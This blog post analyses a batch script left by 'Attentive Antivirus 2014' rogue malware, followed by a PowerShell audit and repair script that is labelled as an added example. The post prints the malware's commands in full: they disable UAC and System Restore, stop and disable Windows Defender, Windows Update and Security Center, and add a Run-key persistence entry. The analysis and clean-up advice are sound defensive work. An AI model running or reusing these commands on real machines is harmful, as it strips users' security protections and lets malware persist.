
Analyzing malware Attentive Antivirus files

2013-08-08 by Jason

Earlier this week, a computer was flagged by our security software as still infected. The malware was residing in C:\ProgramData\aUs6sdpV with an executable of the same name as the folder. Symantec identified it as Suspicious.Cloud.5.A while others flagged it as AA2014 or Attentive Antivirus 2014 malware. More interesting than the executable itself, which ComboFix was able to clean up, was a batch script sitting in the same directory as part of the malware. I copied it here in order to do a little analysis and learn from it.

Fortunately, it is a pretty straightforward script, but I find it interesting to see what malware authors seek to do.

[bash]
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AA2014 /t REG_SZ /d C:\ProgramData\aUs6sdpV\aUs6sdpV.exe
[/bash]

Lines 1-3 set policy values in the registry rather than just creating keys: EnableLUA=0 turns off User Account Control (this one takes effect after a reboot), EnableVirtualization=0 turns off UAC file and registry virtualization, and RPSessionInterval=0 stops System Restore from creating restore points automatically, so the victim has nothing clean to roll back to.

Lines 4-7 stop the Windows Defender (windefend), Microsoft Antimalware (msmpsvc, the Microsoft Security Essentials engine), Windows Update (wuauserv), and Windows Security Center (wscsvc) services, respectively.

Line 8 uses ping as a makeshift “sleep” (three echo requests to localhost, roughly two seconds) to give the services time to stop before they are reconfigured.

Lines 9-13 set those same services to disabled so they do not come back at the next boot, and also disable luafv, the file system filter driver that implements UAC file virtualization.

Line 14 is another makeshift “sleep” through ping.

Lines 15 and 16 delete the Windows Defender entries (MSASCui and “Windows Defender”) from the HKLM Run key that starts the Defender user interface at logon.

Line 17 adds the malware executable to the same Run key under the name AA2014 so it is launched with each start of Windows.

Conclusions

The tasks of this batch script make it easy to reverse-engineer. While an anti-malware tool might remove only the malicious executable, these other files may remain along with the changes to the registry. Clean-up from the malware should consist of setting EnableLUA and EnableVirtualization back to 1 (the UAC change needs a reboot), turning System Restore back on, making sure the disabled services are configured back to their automatic or manual startup states and running, re-adding Windows Defender to the Run key if it is used, and deleting the AA2014 value from the HKLM Run key so Windows does not try to launch an executable that is no longer there.
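As an added example (not code from the original post or from the malware), the line-by-line analysis above and the clean-up steps in this conclusion can be folded into one PowerShell script that audits a machine for every change the batch file makes and, with -Fix, reverts them. The registry paths, value names and service names come straight from the batch script; the "expected" values it restores are assumptions (Windows 7-era defaults for the service start types, RPSessionInterval = 1 for System Restore on, and the usual Windows Defender Run entry) and should be compared against a known-clean machine of the same build before the -Fix switch is used. Run it from an elevated prompt.

```powershell
# Added example, not code from the original article: audit a machine for the
# changes made by the AA2014 batch script and, with -Fix, revert them.
# Run from an elevated PowerShell prompt. The "expected" values below are
# assumptions (Windows 7 defaults); confirm them on a clean machine first.
param([switch]$Fix)

$PolicySystem  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$SystemRestore = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore'
$RunKey        = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$ServicesKey   = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$Findings      = New-Object System.Collections.Generic.List[string]

# 1. Values the script sets to 0 (batch lines 1-3). EnableLUA and
#    EnableVirtualization default to 1; RPSessionInterval = 1 (System Restore
#    on) is an assumption for Windows 7.
$RegistryChecks = @(
    @{ Path = $PolicySystem;  Name = 'EnableLUA';            Expected = 1 },
    @{ Path = $PolicySystem;  Name = 'EnableVirtualization'; Expected = 1 },
    @{ Path = $SystemRestore; Name = 'RPSessionInterval';    Expected = 1 }
)
foreach ($c in $RegistryChecks) {
    $actual = (Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
    if ($actual -ne $c.Expected) {
        $Findings.Add("$($c.Path)\$($c.Name) = $actual (expected $($c.Expected))")
        if ($Fix) { Set-ItemProperty -Path $c.Path -Name $c.Name -Value $c.Expected -Type DWord }
    }
}

# 2. Services the script stops and disables (batch lines 4-13). The registry
#    Start value is read directly so that the luafv filter driver, which
#    Get-Service does not list, is covered too: 2 = auto, 3 = manual, 4 = disabled.
#    The start modes are assumed Windows 7 defaults.
$ServiceChecks = @(
    @{ Name = 'windefend'; Start = 'delayed-auto' },
    @{ Name = 'msmpsvc';   Start = 'auto' },
    @{ Name = 'wuauserv';  Start = 'delayed-auto' },
    @{ Name = 'wscsvc';    Start = 'delayed-auto' },
    @{ Name = 'luafv';     Start = 'auto' }
)
foreach ($s in $ServiceChecks) {
    $name = $s.Name
    $mode = $s.Start
    $key  = Join-Path $ServicesKey $name
    if (-not (Test-Path $key)) { continue }   # e.g. msmpsvc is absent if MSE was never installed
    if ((Get-ItemProperty -Path $key -Name Start).Start -eq 4) {
        $Findings.Add("service $name is disabled (Start=4)")
        if ($Fix) {
            # sc.exe handles both drivers and delayed-auto; plain 'sc' is an alias for Set-Content
            sc.exe config $name start= $mode | Out-Null
            if ($name -ne 'luafv') { Start-Service -Name $name -ErrorAction SilentlyContinue }
        }
    }
}

# 3. Run-key persistence (batch lines 15-17): the AA2014 entry the script adds
#    and the Windows Defender entry it deletes.
$run = Get-ItemProperty -Path $RunKey
if ($run.AA2014) {
    $Findings.Add("Run\AA2014 -> $($run.AA2014)")
    if ($Fix) { Remove-ItemProperty -Path $RunKey -Name 'AA2014' }
}
$defenderUi = Join-Path $env:ProgramFiles 'Windows Defender\MSASCui.exe'
if ((Test-Path $defenderUi) -and -not $run.'Windows Defender' -and -not $run.MSASCui) {
    $Findings.Add('Windows Defender Run entry missing')
    # Assumed default entry for Vista/7; check a clean machine before relying on it.
    if ($Fix) {
        Set-ItemProperty -Path $RunKey -Name 'Windows Defender' -Value "`"$defenderUi`" -hide" -Type String
    }
}

if ($Findings.Count -eq 0) { 'No AA2014 artifacts found.' } else { $Findings }
if ($Fix) { 'Reboot to apply the EnableLUA change.' }
```

Without -Fix the script only reports, which is the mode to run first on a machine you are still investigating. Service start types are read from the Services registry key rather than Get-Service because luafv is a filter driver, not a Win32 service, and for the same reason it is re-enabled with sc.exe and never passed to Start-Service. The Defender Run entry is only re-added when MSASCui.exe is actually present, matching the "if it is used" caveat above.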

Because there can be so much going on after a malware infection, re-installing Windows is the most comprehensive way to ensure that the system is clean and back to its original configuration. A good series to read on the topic:

  • https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+-+Part+2/15406
  • https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+-+Part+3/15448
  • https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+-+Part+4/15460

“Some people are of the opinion that people who “wipe the drive” when they are infected with malware lack the technical expertise and knowledge that is required to remove the malware. I’d argue that the opposite is true. It is the difference between unconscious incompetence and conscious incompetence. There, I said it. I am incompetent when it comes to finding everywhere malware could have hidden on a machine. Given enough time and energy I MIGHT find it all, but is that good enough? If that isn’t good enough then do as I do and just wipe the drive.”

Filed Under: Security and Privacy
